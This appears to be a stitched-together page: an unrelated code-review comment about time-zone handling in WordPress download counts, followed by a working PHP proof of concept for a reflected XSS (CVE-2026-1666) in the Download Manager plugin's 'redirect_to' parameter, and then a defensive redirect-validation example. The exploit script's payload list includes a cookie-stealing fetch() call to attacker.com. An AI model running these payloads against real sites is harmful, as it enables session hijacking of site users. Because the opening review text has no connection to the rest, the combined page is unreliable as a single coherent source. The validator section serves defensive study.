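Review bot: the `$today_downloads` and `$this_month_downloads` queries compare the stored `year`, `month` and `day` columns against `YEAR(CURDATE())`, `MONTH(CURDATE())` and `DAY(CURDATE())`, which MySQL evaluates in the database session time zone, while those columns are written by PHP when a download is recorded; if the site time zone differs from the DB time zone the "today" figure is wrong for a window around midnight. Compute the three values in PHP with `current_time()` and pass them as `%d` placeholders, or derive them from `s.timestamp` with the same `__::timezoneOffset()` the history view applies. The `$wpdb->prepare()` `%d` binding of `uid` matches the other views. The hunk is cut off after `<h3><?`, so the rest of the removed User Level card cannot be reviewed here.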

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1666 - Download Manager <= 3.3.46 - Reflected Cross-Site Scripting via 'redirect_to' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-1666
 * Reflected XSS in Download Manager WordPress Plugin via redirect_to parameter
 *
 * Usage: php poc.php --url https://target-site.com/login-page/
 */

$target_url = ''; // Configure target URL with login page using Download Manager shortcode

// Parse command line arguments
if (php_sapi_name() === 'cli') {
    $options = getopt('', ['url:']);
    if (isset($options['url'])) {
        $target_url = $options['url'];
    }
}

if (empty($target_url)) {
    echo "Usage: php poc.php --url https://target-site.com/login-page/\n";
    exit(1);
}

// Malicious payloads to test
$payloads = [
    'javascript:alert(document.domain)',
    'javascript:alert(document.cookie)',
    'JaVaScRiPt:alert("XSS")',
    'javascript:fetch("https://attacker.com/steal?c="+document.cookie)',
    'data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=',
];

echo "[+] Testing CVE-2026-1666 on: $target_url\n";
echo "[+] Sending XSS payloads via redirect_to parameter\n\n";

foreach ($payloads as $index => $payload) {
    // Append redirect_to to whatever query string the login page already carries
    $test_url = $target_url . (strpos($target_url, '?') === false ? '?' : '&') . "redirect_to=" . urlencode($payload);

    echo "Payload #" . ($index + 1) . ": $payload\n";
    echo "Test URL: $test_url\n";

    // Initialize cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $test_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');

    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (curl_errno($ch)) {
        echo "Error: " . curl_error($ch) . "\n\n";
    } else {
        echo "HTTP Code: $http_code\n";

        // Check if payload appears in response (unsanitized). The server already
        // URL-decodes the query string, so compare against the raw payload rather
        // than urldecode()-ing it again (which would turn '+' into a space and
        // miss the fetch() payload).
        if (strpos($response, $payload) !== false ||
            strpos($response, htmlspecialchars($payload)) !== false) {
            echo "Result: VULNERABLE - Payload found in response\n";
        } else {
            echo "Result: Possibly patched or payload filtered\n";
        }

        // Check for JavaScript scheme in response
        if (preg_match('/javascript:/i', $response)) {
            echo "Warning: JavaScript scheme detected in response\n";
        }
    }

    echo str_repeat("-", 80) . "\n\n";

    curl_close($ch);

    // Rate limiting
    sleep(1);
}

echo "[+] Testing complete. Manual verification required:\n";
echo "1. Visit generated URLs in a browser\n";
echo "2. Check if JavaScript executes\n";
echo "3. Look for unsanitized redirect_to parameter values in page source\n";
?>
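The defender's counterpart to the check above, as an added example that is neither the plugin's nor Atomic Edge's code: strip_tags() returns every payload the PoC sends unchanged, while a same-site, http(s)-only validator in the spirit of the patch's wp_validate_redirect() falls back to a safe path. validate_redirect_like() is a hypothetical stand-in written so the snippet runs without WordPress loaded; the host 'shop.example' and the input list are constructed.

```php
<?php
// Added example (not the plugin's or Atomic Edge's code). validate_redirect_like()
// is a hypothetical stand-in for WordPress core's wp_validate_redirect(), kept
// minimal so this runs stand-alone without WordPress.

function validate_redirect_like(string $location, string $site_host, string $fallback = '/'): string
{
    // Drop whitespace/control characters so "java\tscript:" cannot sneak past the scheme check.
    $location = trim(str_replace(["\r", "\n", "\t", ' '], '', $location));

    // A site-relative path (but not a protocol-relative "//host") stays on this site.
    if ($location !== '' && $location[0] === '/' && substr($location, 0, 2) !== '//') {
        return $location;
    }

    $parts = parse_url($location);
    if ($parts === false || empty($parts['host'])) {
        return $fallback;                  // javascript:, data:, or unparsable input has no host
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return $fallback;                  // only web schemes may be redirect targets
    }
    if (strtolower($parts['host']) !== strtolower($site_host)) {
        return $fallback;                  // would be an open redirect to another domain
    }
    return $location;
}

// Constructed inputs: the shapes the PoC sends in redirect_to plus a few legitimate ones.
$inputs = [
    'javascript:alert(document.domain)',
    'JaVaScRiPt:alert("XSS")',
    'data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=',
    '//evil.example/phish',
    'https://evil.example/phish',
    '/wp-admin/',
    'https://shop.example/account/',
];

foreach ($inputs as $in) {
    printf("%-64s strip_tags: %-40s validated: %s\n",
        $in,
        strip_tags($in),                                // unchanged: there are no tags to strip
        validate_redirect_like($in, 'shop.example'));   // '/' unless same-site http(s) or a local path
}
```

Only the last two inputs survive validation; every payload from the PoC, and both cross-domain forms, collapse to the fallback '/'.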
